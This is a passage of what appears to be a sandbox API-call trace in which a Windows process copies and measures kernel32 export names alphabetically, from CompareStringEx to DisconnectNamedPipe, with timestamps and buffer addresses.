returned="CompareStringEx" [0077.017] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.017] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.017] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.018] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.018] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.018] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.018] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.018] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.018] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.018] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.018] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.018] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.018] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.018] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.018] lstrlenA (lpString="COPYFILEA") returned 9 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.018] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.018] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.018] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.018] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.018] lstrlenA (lpString="COPYFILEW") returned 9 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.018] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.019] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.019] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.019] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.019] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.019] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.019] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.019] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.019] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.019] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.019] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.019] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.019] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.019] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.019] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.019] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.019] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.019] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.019] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.019] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.020] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.020] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.020] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.020] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.020] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.020] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.020] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.020] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.020] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.020] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.020] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.020] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.020] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.020] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.020] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.020] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.020] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.020] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.021] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.021] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.021] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.021] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.021] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.021] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.021] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.021] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.021] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.021] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.021] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.021] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.021] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.021] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.021] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.021] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.021] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.021] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.022] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.022] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.022] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.022] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.022] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.022] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.022] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.022] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.022] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.022] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.022] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.022] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.022] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.022] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.022] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.022] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.022] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.022] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.022] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.023] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.023] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.023] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.023] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.023] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.023] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.023] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.023] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.023] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.023] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.023] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.023] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.023] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.023] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.023] lstrlenA (lpString="DELETEATOM") returned 10 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.023] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.023] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.023] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.023] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.024] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.024] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.024] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.024] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.024] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.024] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.024] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.024] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.024] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.024] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.024] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.024] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.024] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.024] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.024] lstrcpyA (in: 